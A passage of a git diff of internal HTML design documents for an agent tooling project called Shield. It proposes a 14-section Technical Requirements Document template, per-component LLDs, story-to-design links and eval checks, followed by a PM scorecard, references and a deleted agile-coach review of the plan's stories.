3Module layoutYesFile tree with new/mod/unchanged badges
4Data modelYesTables + Redis/cache namespaces with column-level detail
5API contractsYesPer-endpoint request/response (each endpoint gets its own sub-anchor, e.g., #api-create-user)
6Sequence flowsYesMermaid sequence diagrams (each flow gets its own sub-anchor, e.g., #flow-signup)
7Error handlingYesError codes + behavior matrix
8Concurrency & stateYesNamed race conditions and resolutions
9ConfigurationPromote-on-demandConfig values; lifted when the component needs them
10ObservabilityYesLogs, metrics, traces
11Security & privacyPromote-on-demandAuth, PII, threats; lifted when the component touches user data
12Performance & scalingYes — 8 forced subsections12.1 Load · 12.2 SLO · 12.3 Bottleneck · 12.4 Latency breakdown · 12.5 Capacity · 12.6 Scale-out lever · 12.7 Caches · 12.8 Degradation. "n/a — " is the only escape; vague prose is not allowed.
13Open questionsYesQ#, question, options, owner, resolve-by table
14ChangelogYesEvery edit ties to a story ID + sections touched — closes the loop with plan.json design_refs[]
-

Header metadata (above §1): Feature · Owner · Status · Linked PRD · Linked plans (plural — one LLD, many plans) · Version · Last updated.

-

Why this shape works for Shield:

-
    -
  • Per-component scope with Linked plans plural matches the user's "same LLD doc covered across multiple milestones" intent.
  • -
  • Stable kebab-case anchors on every section AND subsection — directly addresses Confluence-style anchor-rot the research surfaced.
  • -
  • §12's 8 forced subsections are the strongest anti-format-drift mechanism in the template: a fixture-based eval can mechanically check that all 8 are present and non-empty, with "n/a — <reason>" as the only allowed escape.
  • -
  • §14 Changelog with story IDs is the inverse of design_refs[] on the story side — the LLD knows which stories touched it; the story knows which LLD sections it depends on. Bidirectional graph.
  • -
  • §9 + §11 promote-on-demand acknowledges that not every component touches config or user data — keeps the template scoped to reality without losing the slot.
  • -
-

Why Not Keep plan-architecture.md?

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Today's plan-architecture.mdProposed unified TRD
Domain coverageDe-facto infra/ADR-flavoredBoth infra and backend — same template, domain-aware prompting per section
OriginShield convention; closer to ADR + HLD hybridIEEE 1016 + reference TRD template + Google design-doc lineage
HLD coverageSolution sketch + 5 numbered decisions + PR sequencingFull HLD viewpoint coverage: context, composition, interfaces, NFRs
NFRsImplicitExplicit §6 (forced for both domains — SLOs/RPO/RTO/cost matter for infra too)
AlternativesPresent (good)Preserved in §8 — the ADR-style "decisions with trade-offs" pattern lives here
Rollback strategyPresent in plan-architecture.mdPromoted to first-class §14 (universal)
Milestones"Deliverables" as PR sequencingFirst-class §10 — feature phases (backend) or phased rollout (infra)
Cross-cuttingImplicitExplicit §9 — forces IAM/cost/observability/DR for infra
Story traceabilityNone (LLD-shaped content buried in plan.json descriptions)Each story gets design_refs[] pointing to TRD/LLD sections
Reviewer rubricFree-formStructured — /plan-review grades 14 fixed sections (with n/a — <reason> escape)
-

The unified TRD subsumes everything plan-architecture.md does well (decisions, alternatives, rollback) and adds the structural rigor that infra plans currently lack (forced NFRs, Cross-Cutting, first-class Milestones).

-

What the Industry Recommends

-

IEEE 1016-2009 — Software Design Descriptions

-
-

"A representation of a software design to be used for communicating design information to its stakeholders."

-

"Design view: A representation comprised of one or more design elements to address a set of design concerns from a specified design viewpoint." -— IEEE Std 1016-2009, Clause 3 — full PDF via Çankaya University

-
-

IEEE 1016 names 12 design viewpoints (Context, Composition, Logical, Dependency, Information, Patterns-use, Interface, Structure, Interaction, State dynamics, Algorithm, Resource). A defensible HLD-vs-LLD split treats the first ~7 (Context → Interface) as HLD and the last ~5 (Structure → Resource) as LLD. The proposed TRD §7 (HLD) covers Context + Composition + Logical + Interface viewpoints; §11 (APIs Involved) covers Interface explicitly. LLD covers Structure + State + Algorithm + Resource.

-

Ian Sommerville, Software Engineering (10th ed., Ch. 6)

-
-

"Architectural design is concerned with understanding how a software system should be organized and designing the overall structure of that system."

-

"Architectural design is the critical link between design and requirements engineering as it identifies the main structural components in a system and the relationships between them."

-

"Architecture may be used as a focus of discussion by system stakeholders. … Analysis of whether the system can meet its non-functional requirements is possible. … The architecture may be reusable across a range of systems." -— Sommerville, Chapter 6 §6.1

-
-

Sommerville's three justifications for explicit architecture — stakeholder communication, NFR analysis, reuse — map directly to TRD §4 (Product Journey, stakeholder communication), §6 (NFRs explicit), §7 (HLD as reusable architectural template).

-

Roger Pressman, Software Engineering: A Practitioner's Approach (8th ed.)

-

Pressman organizes design into four layers:

-
-

"Architectural design defines the relationship between major structural elements of the software, the architectural styles and design patterns that can be used to achieve the requirements defined for the system."

-

"Component-level design transforms structural elements of the software architecture into procedural description of software components."

-
-

Pressman's split — architectural + data + interface (HLD) vs. component-level (LLD) — is the cleanest textbook mapping for the TRD/LLD layering.

-

Malte Ubl — "Design Docs at Google"

-
-

"The design doc is the place to write down the trade-offs you made in designing your software."

-

"A short list of bullet points of what the goals of the system are, and, sometimes more importantly, what non-goals are."

-

"This is where your organization can ensure that certain cross-cutting concerns such as security, privacy, and observability are always taken into consideration."

-

"A clear indicator that a doc might not be necessary are design docs that are really implementation manuals. If a doc basically says 'This is how we are going to implement it' without going into trade-offs, alternatives, and explaining decision making … then it would probably have been a better idea to write the actual program right away." -— Design Docs at Google, industrialempathy.com

-
-

Google's template — Context · Goals/Non-goals · The design · Alternatives · Cross-cutting concerns — is the empirical template Shield's existing plan-architecture.html already resembles. Adopting it explicitly closes the gap.

-

Will Larson — lethain.com

-
-

"Design documents describe the decisions and tradeoffs you've made in specific projects."

-

"A batch of five design docs is the ideal ingredient for writing an effective strategy because design documents have what bad strategies lack: detailed specifics grounded in reality."

-

"You should write a design document for any project whose capabilities will be used by numerous future projects … any work taking more than a month of engineering time."

-

"Gather perspectives widely but write alone." -— Writing an engineering strategy, lethain.com

-
-

Larson's "design-doc-as-decision-artifact" framing reinforces that the TRD should privilege decisions and trade-offs over comprehensive specification. The "write alone" rule is implementation guidance for the /plan agent: produce a single, opinionated TRD per run, not a consensus-shaped one.

-

Gergely Orosz — The Pragmatic Engineer

-
-

"Software engineers who write design docs for their architecture — and ask for reviews on it — often ship more maintainable architecture."

-

On Uber's RFC scale problems at >2,000 engineers: "Noise: Hundreds of RFCs weekly overwhelmed experienced engineers; Ambiguity: Unclear which work required documentation; Discoverability: Documents scattered across Google Drive." -— RFCs and Design Docs, blog.pragmaticengineer.com

-
-

Orosz's account of design-doc value at scale supports adopting a uniform template for Shield's TRD output. Shield's /plan audience is one team per run, so the Uber-scale "tiered templates" remediation doesn't apply — a single 14-section template is the right level of structure.

-

Simon Brown — The C4 model

-
-

"Container" — a separately runnable/deployable unit (e.g., a server-side web application, a single-page application, a desktop application, a mobile app, a database schema, a file system) that executes code or stores data.

-

"Component" — a grouping of related functionality encapsulated behind a well-defined interface. From an implementation perspective, components are typically a collection of implementation classes/objects." -— The C4 model for visualising software architecture, c4model.com

-
-

The C4 model's Container and Component levels are the natural granularity for LLD documents in Shield's setup. One LLD per Container (or per Component for finer-grained services) cleanly aligns with how engineers reason about ownership and deployability — and avoids the milestone-LLD-proliferation that per-milestone LLDs would cause for cross-cutting components.

-

Reference TRD's actual practice (Notion workspace, internal evidence)

-
-

Reference TRD Template (last edited 2025-11-04) explicitly: "HLD — Objective: Explain how the system will behave end-to-end. Include: Block diagram or sequence diagram showing data flow between frontend, backend, and external services / Key microservices involved / Event triggers, queues, APIs, and DBs touched."

-

"LLD — Objective: Capture how each component or service works internally. Include: Components / Class/State diagrams / Database schema changes / API Contracts / Non Functional Aspects (error handling, retry, config) / Caching or fallback mechanisms." -— Reference TRD Template (Notion)

-
-

Observed deviations from the reference template in real artifacts:

-
    -
  • Large features split HLD and LLD into separate Notion pages. One library LLD opens: "The TRD describes what the library does and why. This LLD describes how."
  • -
  • Small features keep HLD+LLD inline but omit the section labels entirely — using functional headings like "Architecture Components" and "Implementation Plan."
  • -
  • "Solutioning" is used as a sibling term to HLD (one HLD title: "... — High-Level Design & Solutioning Document") — signals that decision-rationale lives next to the architecture, validating the Alternatives + Cross-Cutting sections.
  • -
  • One reference TRD has an explicit "Implementation Plan" section with 5 phases — a real precedent for the proposed §10 Milestones.
  • -
-

LLD granularity in the reference workspace is per-service/per-library (one example LLD covers a single library and is referenced by whichever milestone touches it). Shield will adopt this convention: LLDs are per-component (C4 Container/Component level), and the TRD's §10 Milestones declares which LLD components each milestone touches. A single LLD doc grows incrementally across milestones.

-

How This Works in Practice — /plan Refactor Flow

-
PRD (optional)
-   │
-   ▼
-/plan ────────────► TRD (HLD + Milestones)  ←── replaces plan-architecture.md
-   │                  │
-   │                  ├─ §1–9: HLD (problem, goals, design, NFRs, cross-cutting)
-   │                  ├─ §10: Milestones — each lists touched LLD components
-   │                  └─ §11–14: APIs, open Qs, references, rollback strategy
-   │
-   ▼
-plan.json (stories with design_refs[])
-   │
-   ├──► /implement (consumes story + design_refs[])
-   ├──► /pm-sync (consumes plan.json; design_refs[] become PM-tool links)
-   └──► [future] /lld <component>  ──► per-component LLD doc (14-section template from PR #43)
-              │
-              ├─ Header: Linked plans = [plan/M1, plan/M2, ...]   ← bidirectional
-              ├─ §1 Overview names the epics/milestones served
-              ├─ §14 Changelog: each edit has Story ID + sections touched
-              │
-              ├─ M1 may touch [lld-component-auth.md, lld-component-api.md]
-              ├─ M2 may touch [lld-component-api.md, lld-component-ui.md]
-              └─ Same LLD doc grows incrementally across milestones; §14 records each touch
-
-

Reference example: tesseract PR #43docs/superpowers/specs/2026-05-18-lld-sample.html. Bytebite user-signup LLD. 704 lines of HTML, 14 sections, 12 always-on + 2 promote-on-demand, with stable kebab-case anchors on every section and subsection. This is the structural model /lld will emit.

-

Story-to-design-section reference contract

-

Add an optional design_refs[] array to each story in plan.json:

-
{
-  "id": "E1-S1",
-  "title": "Implement POST /users endpoint",
-  "design_refs": [
-    {
-      "doc": "trd",
-      "section_id": "high-level-design",
-      "anchor_url": "trd.md#high-level-design",
-      "label": "TRD §7 High-Level Design"
-    },
-    {
-      "doc": "lld",
-      "component": "user-service",
-      "section_id": "api-create-user",
-      "anchor_url": "lld-user-service.md#api-create-user",
-      "label": "LLD §5.1 POST /users"
-    }
-  ]
-}
-
-

Properties:

-
    -
  • Additive — adapters that don't understand design_refs ignore it. No /pm-sync schema break.
  • -
  • Component-scoped — LLD refs include component so multiple stories across multiple milestones can point at the same LLD doc; the LLD's Linked plans header and §14 Changelog close the loop on the other side.
  • -
  • Stable kebab-case anchorssection_id matches the LLD sample's explicit id="..." attributes (e.g., #api-create-user, #perf-load), not heading-derived. Confluence-style anchor-rot bugs (CONFSERVER-26897/28087/41483) don't apply because we author the IDs explicitly.
  • -
  • Subsection-resolvable — points at #api-create-user (LLD §5.1), not just #api-contracts (LLD §5). Required for the precision the LLD sample establishes (per-endpoint, per-flow, per-perf-aspect anchors).
  • -
  • Forward-resolvablelld refs can be added when the LLD is authored; the TRD generator leaves them as TODO entries until then.
  • -
  • PM-sync adapter behavior: Confluence/Jira → web link with anchor URL. ClickUp → URL custom field (+ optional Doc relate). Notion → URL property (+ optional Database relation).
  • -
-

De-duplication contract (addresses the user's named risk)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ConcernOwner docTRD treatment
User problem, personas, business impactPRDTRD §2 links the PRD; restates problem in 1 sentence max for self-containment
Functional requirements (what users do)PRDTRD §5 links PRD's user stories; doesn't restate them
Non-functional requirementsPRD names targets; TRD specifies architecture-level NFRsTRD §6
Architecture & designTRDTRD §7
Alternatives & trade-offsTRDTRD §8
Component-internal algorithms, schemas, contractsLLDTRD §11 lists which APIs; LLD specifies their internals
Work breakdownplan.jsonPlan generates stories; stories design_refs[] back to TRD/LLD
-

Rule (paraphrased from Koko Product on PRD vs TRD): "PRD owns why; TRD owns how at architecture level; LLD owns how at component level; plan owns work breakdown. Cross-references replace restatement."

-

Failure Modes & Countermeasures

-

Community research surfaced 10 named failure modes. Five are directly addressable by Shield's eval framework + structural choices:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Failure modeSourceShield countermeasure
Format drift across agent runs — different sessions produce differently-shaped TRDsUser's stated risk + Cvet 2020 + acatton (Lobsters) — "authors and reviewers felt that most of the RFC template was superfluous"Schema-validated TRD eval: a fixture-based eval asserts presence of §1–14, asserts each section is non-empty (with n/a — <reason> as the only allowed escape), asserts design_refs[] shape. Backend + infra positive fixtures both pass. RED → GREEN trail required per CLAUDE.md.
Content duplication PRD↔TRD↔plan — same content restated, drifts independentlyUser's stated risk + Plane.so + Koko Product — "Keep the boundary clean."The de-duplication contract above + a /plan-review rule: flag any TRD section that restates PRD content verbatim.
Undead documentation / silent divergence — doc reflects an outdated realityDoug Turnbull (softwaredoug.com) — "most design docs lie to you. They're undead documentation"; Lucas Costa — "Either you update the doc (which nobody does) or you diverge from it silently"Shield's /plan re-runs update the same files in place (per current behavior). Combined with git history, the TRD is a snapshot at decision time. Recommend a last_aligned_with: <commit-sha> metadata field updated by /implement when stories close.
Over-specification ("LLD too early") — schema/API decisions before query patterns are understoodLucas Costa — "you have the least information at the beginning of a project, which is exactly when design docs ask you to make the most decisions"Defer LLD to per-milestone authoring. TRD §11 names which APIs change; LLD specifies their internals only when the milestone begins.
Implementation-manual pseudo-code — doc just narrates code with no trade-offsGoogle design-docs doc — "design docs that are really implementation manuals … it would probably have been a better idea to write the actual program right away"/plan-review rule: flag any HLD section that contains code blocks > N lines without an "Alternatives Considered" rationale.
-

Five more failure modes (design-doc theatre, review-rubber-stamp, RFC firing-squad, authority fragmentation, template bloat) are governance issues not directly fixable by structural choices — flag as future /plan-review rubric expansions.

-

Decisions Locked & Open Questions

-

Decisions locked with the user (2026-05-24 → 2026-05-25)

-
    -
  1. LLD granularity: strictly per-component (C4-inspired). One LLD per Container or Component (service, library, module). Milestones list which LLDs they touch; LLDs grow incrementally as milestones land. LLDs are typically backend-only; infra rarely needs an LLD layer.
  2. -
  3. No lean variant. The full 14-section template is required for every TRD. (Orosz's tiered-template pattern applies at >2,000-engineer scale, not Shield's per-team scope.)
  4. -
  5. Direct cutover. /plan stops writing plan-architecture.md immediately. No feature flag, no side-by-side period. Existing plan-architecture.md files remain readable; no migration tool needed.
  6. -
  7. Section enforcement: strict via eval, with n/a — <reason> escape. All 14 TRD sections are required by the schema-validated eval. Missing any section is an eval failure with a named error. An explicit n/a — <reason> line counts as present; vague TBDs or empty sections fail.
  8. -
  9. One TRD, two domains. Same 14-section template applies to backend AND infrastructure work. Domain-aware prompting per section in /plan's SKILL.md surfaces the right interpretation; the eval and /plan-review rubric do not fork.
  10. -
  11. §14 Rollback Strategy is a first-class section. Preserves the strongest property of today's plan-architecture.md.
  12. -
-

Open questions for the implementation phase

-
    -
  1. design_refs[] resolution at PM-sync time. Should adapters auto-create Confluence/Notion pages and link them, or only emit URLs and trust the user to author the pages? Recommendation: emit URLs only in v1; adapter authoring is a v2 enhancement.
  2. -
  3. Section-ID stability. TRD section anchors should be stable kebab-case slugs (#high-level-design), not heading-derived (which break on rename per Confluence CONFSERVER-26897/28087/41483). Concrete recommendation: emit explicit {#section-id} markdown anchors in the TRD template, and validate the slug set is the canonical 14 in the eval.
  4. -
  5. TRD ↔ LLD linking direction. TRD §10 lists LLDs each milestone touches (forward link). Should LLDs maintain backlinks to milestones/TRD? Recommendation: yes, but auto-generated/lld reads the TRD, fills in a "Referenced By" section in the LLD pointing back to milestones. Avoids manual link-rot.
  6. -
  7. /pm-sync adapter behavior for design_refs[]. Confluence → web link with anchor URL. Jira → remote issue link. ClickUp → URL custom field. Notion → URL property. Open: should ClickUp/Notion also populate a Relationship/Database-relation if the design doc exists in the same tool? Recommendation: v1 emits URL only, structured relationships are v2.
  8. -
  9. Eval shape for TRD. Concrete eval design: a fixture TRD with all 14 sections present passes; fixtures missing any section fail with a named error per section. Bidirectional check: the LLM does not add unprompted sections (drift-by-addition). n/a — <reason> lines count as present; vague TBDs or empty sections do not. Coverage includes both backend and infra positive fixtures. All covered by shield/evals/plan-trd.yaml fixture set.
  10. -
-

Migration Path / Reversibility

-

The refactor is a direct cutover; reversibility cost is low:

-
    -
  • Forward: /plan adds TRD generation step before plan.md/plan.json. plan-architecture.md is replaced by trd.md immediately (no feature flag). Story schema gains optional design_refs[]. /plan-review gets new TRD-section rules. Estimated work: one PR for the /plan command + plan-docs SKILL.md changes, one PR for evals, one PR for /plan-review rule additions.
  • -
  • Reversal: If the TRD approach proves wrong, revert plan-docs/SKILL.md to the pre-refactor template + restore plan-architecture.md generation. Existing trd.md files remain readable in old feature folders. design_refs[] is optional everywhere, so removing it is a no-op for downstream adapters.
  • -
  • Existing artifacts: Pre-refactor feature folders keep their plan-architecture.md — no rewrite, no migration. New folders get trd.md. This is git-history-friendly and doesn't break anyone reading older docs.
  • -
-

Summary

-

The TRD = HLD + PM-lens milestones + Rollback Strategy design is well-supported by the IEEE 1016 / Sommerville / Pressman lineage, mirrors the reference TRD template, and aligns with Google + Uber + Larson + Orosz modern practice. The unified 14-section TRD template covers both backend and infrastructure work, with domain-aware prompting per section and an explicit n/a — <reason> escape for sections that genuinely don't apply; the 14-section LLD template (anchored in tesseract PR #43's Bytebite sample) is the per-component layer authored separately and is typically backend-only since infra code is declarative-spec-as-code. LLDs are per-component (C4-inspired) — a single LLD covers one Container or Component, lists multiple Linked plans in its header, and grows incrementally as milestones touch it; §14 Changelog records each touch with a Story ID. Story traceability via additive design_refs[] (component-scoped, subsection-precise) is the highest-signal way to link work to design without breaking /pm-sync. The two named risks (format drift, content duplication) have concrete countermeasures: schema-validated evals enforcing all sections (and §12's 8 forced subsections in the LLD), and a de-duplication contract ("PRD owns why, TRD owns how at architecture, LLD owns how at component, plan owns work breakdown"). The refactor is a direct cutover with no feature flag; reversal is a simple revert with no migration burden.

-

Product Lens

-

Scorecard (PM1–PM11)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
DimNameGradeSeverityGap
PM1User impact clarityDCriticalRoles named abstractly ("reviewers", "engineers"); no quantified before/after per persona
PM2Problem–solution fitBCriticalMissing explicit Problem Statement section before Decision; named risks appear pre-problem
PM3Scope disciplineBImportant14 TRD + 14 LLD sections (+ §12's 8 forced subsections) reads kitchen-sink; no MVP cut explicit
PM4Prioritization rationaleDImportantThree PRs listed without effort/impact tags or stated dependencies
PM5Stakeholder communicabilityDImportantJargon-saturated; no plain-language summary a non-technical reader could follow
PM6Market / competitive awarenessAWarningStrong: plan-architecture.md, reference TRD, Google, Uber, IEEE 1016, C4, arc42, ADR all compared
PM7Adoption / rollout riskBImportantTechnical risks covered; adoption-side risks (learning curve, change mgmt, partner buy-in) missing
PM8Success metrics definedFImportantNo measurable post-ship outcome (no thresholds, targets, observable behaviors)
PM9Reversibility / exit costAWarningStrong: clean revert path, no migration burden, additive schema
PM10Business value alignmentFCriticalNo tie to business goal/OKR/customer escalation/compliance — justified entirely on engineering grounds
PM11Framing coverage honoredBImportantAll 5 PF7 voices quoted; PF8 "Vendor docs" category has refs but no verbatim body quote
-

Composite: 2A · 3B · 3D · 2F (≈ C+ overall). 3 Critical gaps to close before this is plan-ready: PM1 (user-impact quantification), PM2 (Problem Statement section), PM10 (business-value tie-in).

-

User Impact Analysis

-

The proposed TRD refactor directly serves five user populations identified in the framing brief, and the research provides differentiated evidence for each:

-
    -
  • Shield maintainer — Highest leverage beneficiary. The named risks (format drift, content duplication) get concrete countermeasures: a schema-validated eval enforces all 14 TRD sections, and the de-duplication contract codifies ownership across PRD/TRD/LLD/plan. Risk of inaction: continued ad-hoc plan-architecture.md output that /plan-review can only grade free-form.
  • -
  • Staff/senior engineers reading the TRD — Gain a predictable artifact grounded in IEEE 1016 viewpoints, Sommerville's three architecture justifications, and the reference TRD template. Research quantifies coverage: 12 IEEE viewpoints, split ~7 HLD / ~5 LLD; 14 canonical TRD sections; 14 canonical LLD sections (12 always-on + 2 promote-on-demand).
  • -
  • Junior/mid engineers consuming via /implement — Gain unambiguous design pointers via design_refs[] with subsection-precision (e.g., #api-create-user not #api-contracts). Research cites the Bytebite sample (PR #43, 704 lines, kebab-case anchors on every section and subsection) as the concrete structural target.
  • -
  • /plan-review reviewer agents — Gain stable section anchors enabling structured rubrics instead of free-form grading. Research surfaces five mechanically-enforceable rules.
  • -
  • /pm-sync — Hard backward-compat constraint is met: design_refs[] is additive, adapters ignore unknown fields. No schema break.
  • -
-

Unquantified gaps:

-
    -
  • No estimate of how many existing feature folders carry plan-architecture.md. Direct-cutover migration risk is asserted "low" but not measured.
  • -
  • No baseline for current /plan-review defect-catch rate vs. expected post-refactor rate.
  • -
  • "Future LLD-authoring command" is described but its build effort is not estimated.
  • -
-

Scope Recommendation

-

Essential (MVP — ship in v1 cutover):

-
    -
  1. /plan emits trd.md with the canonical 14 sections (replaces plan-architecture.md).
  2. -
  3. Stable kebab-case section anchors emitted explicitly as {#section-id} markdown anchors.
  4. -
  5. plan.json story schema gains optional additive design_refs[] with {doc, section_id, anchor_url, label}.
  6. -
  7. Schema-validated eval fixture pair (positive + missing-section negatives) under shield/evals/plan-trd.yaml.
  8. -
  9. /plan-review rules for the 14 required sections (with n/a — <reason> escape) + at least one duplication-detection rule.
  10. -
-

Defer (v2 enhancements):

-
    -
  • /lld <component> command — template locked; authoring command is "future". v1 leaves lld refs as TODO entries.
  • -
  • Adapter auto-creation of Confluence/Notion pages from design_refs[] — v1 emits URLs only.
  • -
  • Structured ClickUp/Notion relationships — v1 emits URLs only.
  • -
  • last_aligned_with: <commit-sha> metadata for undead-doc countermeasure.
  • -
  • /lld auto-generated "Referenced By" backlinks.
  • -
  • Governance failure-mode rules (design-doc theatre, review-rubber-stamp, etc.).
  • -
-

Cut entirely:

-
    -
  • Lean TRD variant — research locks this as rejected. Do not relitigate.
  • -
  • Migration tool for existing plan-architecture.md — direct cutover, no migration.
  • -
-

Prioritization Framework

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityWork itemEffortImpactDependency
P0Schema-validated TRD eval fixture pair + section slug allow-listMVery high — strongest format-drift countermeasure; CLAUDE.md mandateSection list locked (done)
P0/plan command + plan-docs/SKILL.md updates to emit trd.md with 14 canonical sections, domain-aware prompting per section, and explicit {#section-id} anchorsLVery high — the actual cutoverNone
P0plan.json story schema: additive design_refs[]SHigh — story traceability + /implement consumptionNone (additive)
P1/plan-review rules for required-section presence + 1 duplication-detection ruleMHigh — converts free-form review into structured gradingP0 schema lands first
P1/pm-sync adapter handling for design_refs[] URL emission (all four adapters)MMedium — read-only forward link in v1design_refs[] shape locked (done)
P2last_aligned_with metadata + /implement update on story closeSMedium — undead-doc countermeasureAfter v1 stable
P2/plan-review rules for remaining failure-mode countermeasuresMMedium — incremental review qualityAfter P1
P3 (deferred)/lld <component> command + LLD eval fixturesLHigh for LLD consumers — but no LLD consumers exist yetAfter v1, separate epic
P3 (deferred)Adapter auto-creation of design-doc pagesLLow — research recommends URL-only in v1After /lld
-

Sequencing rationale: P0 items land together in the cutover PR (eval can't ship before generator; generator shouldn't ship without eval). design_refs[] is additive and zero-risk, so it goes in v1 even with no consumer yet — locking the contract early avoids a v2 migration. /lld is genuinely deferrable because the TRD references LLDs by URL with TODO entries until the command exists.

-

Stakeholder Summary

-

Shield's /plan command today produces a work breakdown and a free-form architecture sketch (plan-architecture.md). Engineers reading the output have no predictable place to find the system design, and reviewers have no consistent shape to grade against. The research recommends replacing the free-form sketch with a Technical Requirements Document (TRD) — a 14-section template grounded in the IEEE software-design standard, mirrored from the reference TRD template, and consistent with how Google, Uber, and respected practitioners (Will Larson, Gergely Orosz) describe modern design-doc practice. The TRD covers the what and the architecture-level how of a feature. The deeper component-internal details (database schemas, API internals, race-condition handling) move to per-component Low-Level Design (LLD) documents authored separately when each milestone begins, following a 14-section template Shield already has a working sample for. Every story in the work plan gains an optional pointer to the exact section of the TRD or LLD it depends on, so an engineer picking up a story can find the design in one click. The change ships as a direct replacement with no migration burden — existing feature folders keep their old artifacts and stay readable. The two biggest risks of templated design docs (templates drifting in shape across runs, and the same content being restated in three places that then disagree) are addressed with an automated check that enforces the section list and a written ownership rule of which document owns which content. The first release lands the new TRD output, the schema-enforcing test, and the story-to-design pointers; the LLD command and richer reviewer rules follow in a second release.

-

Critical gaps — user verdict (2026-05-24)

-

The three Critical-severity findings were reviewed with the requester. All three are acknowledged as artifacts of applying the full PM1–PM11 rubric (designed for PRDs / product features) to an internal-tooling research artifact. Verdict per gap:

-
    -
  1. PM1 — Quantified user-impact per persona. Resolution: the refactor's value is a baseline add to how tech teams currently work — the personas (plan author, reviewer, /implement consumer) all benefit uniformly. No additional quantification needed for an internal tooling change.
  2. -
  3. PM2 — Explicit Problem Statement section. Resolution: not required. Going to implementation directly; the Context paragraph at the top of this doc carries enough framing for engineering work.
  4. -
  5. PM10 — Business-value tie-in. Resolution: the value is to help tech teams iterate faster by automating planning steps that previously required free-form judgment. Not a business-OKR question for an internal Shield meta-tooling refactor.
  6. -
-

PM8 (success metrics) and PM4/PM5 (prioritization rationale, stakeholder communicability) are Important but not blocking — folded into the implementation work where the Prioritization Framework table already addresses sequencing.

-

References

- -

Internal references (Notion — reference workspace)

-
    -
  • Reference TRD Template (last edited 2025-11-04)
  • -
  • Reference LLD example (per-library scope, 2026-05-10) — per-library LLD example
  • -
  • Reference HLD example (module-first, 2026-04-15)
  • -
  • Reference HLD example with "Solutioning" sibling label (2026-04-01)
  • -
  • Reference HLD example (minimal, small features, 2026-05-21)
  • -
  • Reference TRD with explicit 5-phase Implementation Plan precedent (2026-01-04)
  • -
-

Internal references (Shield repo)

-
    -
  • docs/shield/agent-behavior-decomposition-20260520/outputs/plan-architecture.html — baseline ADR+HLD hybrid the TRD must improve on
  • -
  • tesseract PR #43docs/superpowers/specs/2026-05-18-lld-sample.html — canonical 14-section LLD sample (Bytebite user-signup); reference structure for the /lld command
  • -
-

Further Exploration

-

Curated for going deeper; NOT cited in body above.

-

Books

-
    -
  • Bass, L., Clements, P., Kazman, R. (2021). Software Architecture in Practice (4th ed.). The module/component-and-connector/allocation viewtype taxonomy is a cleaner alternative to Pressman's four layers.
  • -
  • Bryar, C., Carr, B. (2021). Working Backwards. Amazon's PR/FAQ tradition for the PRD-upstream framing.
  • -
  • Fournier, C. (2017). The Manager's Path. ADRs vs design docs distinction in tech-lead chapters.
  • -
-

Long-form blogs / articles

-
    -
  • Brown, S. "The C4 model for visualising software architecture." c4model.com — quoted in body above; Container/Component levels are the chosen LLD granularity.
  • -
  • arc42 template. arc42.org — open-source 12-chapter architecture-doc scaffold widely used in DE/EU teams.
  • -
  • ThoughtWorks. "Lightweight architecture decision records." For the "TRD = HLD + ADR" hybrid Shield is gravitating toward.
  • -
-

Videos / talks

-
    -
  • Larson, W. on engineering strategy at LeadDev. For the "five design docs → one strategy" pattern.
  • -
-

Courses

-
    -
  • (None curated this round — open opportunity.)
  • -
-

Podcasts / podcast episodes

-
    -
  • StaffEng Podcast — multiple episodes on design-doc practice with senior+ engineers.
  • -
-

Other

-
    -
  • Joel Henderson's ADR catalog. adr.github.io — patterns for ADRs as supplement to (not replacement of) HLD.
  • -
  • HashiCorp's public RFC template. Useful comparison point for infra-leaning teams.
  • -
- -
-
Generated by Shield
- - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html deleted file mode 100644 index fe95f4e3..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html +++ /dev/null @@ -1,165 +0,0 @@ - - - - -Plan Review — /plan TRD refactor - - - -

Agile Coach — Detailed Findings

-
-

Back to summary

-
-

Agile Coach Review (Grade: A-)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#Evaluation PointGradeNotes
AC1Story sizingA12 stories across 5 epics, each story is a clear, atomic deliverable. None are multi-week; none are trivial sub-tasks. EPIC-3-S2 is the largest (14 negative fixtures) but is appropriately scoped as one cohesive deliverable.
AC2Story independenceA-M1 stories can largely run in parallel (EPIC-1-S1, EPIC-2-S1, EPIC-3-S1 are independent docs/schema/fixture tasks). EPIC-1-S2 depends implicitly on EPIC-1-S1's slug allow-list; EPIC-2-S2 depends on EPIC-2-S1; EPIC-3-S2 depends on EPIC-3-S1's positive fixture. These intra-milestone deps could be explicit but are inferable from content.
AC3Dependency orderingAMilestones have an explicit DAG: M1 → M2 → M3 via depends_on in sidecar.milestones[]. No cycles. EPIC-3-S3 explicitly orders RED before GREEN. Story sequencing within M1 is logical (template → emit → re-run guard; schema → populate; fixtures → wire).
AC4Context completenessAEvery story has a "why" paragraph in description. Examples: EPIC-2-S1 explains "preserve back-compat (missing field is ignored)"; EPIC-5-S1 explains "Countermeasure for undead-doc drift"; EPIC-1-S3 explains the deterministic re-run policy and "no migration."
AC5Requirements clarityARequirements are specific and measurable. Examples: "exactly 14 entries" in slug list (EPIC-1-S1 AC2), "40-char hex sha" (EPIC-5-S1 AC2), "> 80 characters of consecutive verbatim overlap" (EPIC-4-S2 task), ">20-line code block" threshold (EPIC-5-S2).
AC6Implementation step qualityA-Tasks cite exact files, exact field names, and exact thresholds. Minor gap: EPIC-4-S3 says "Update the relevant adapter logic" without naming the adapter files for each tool (just the directory).
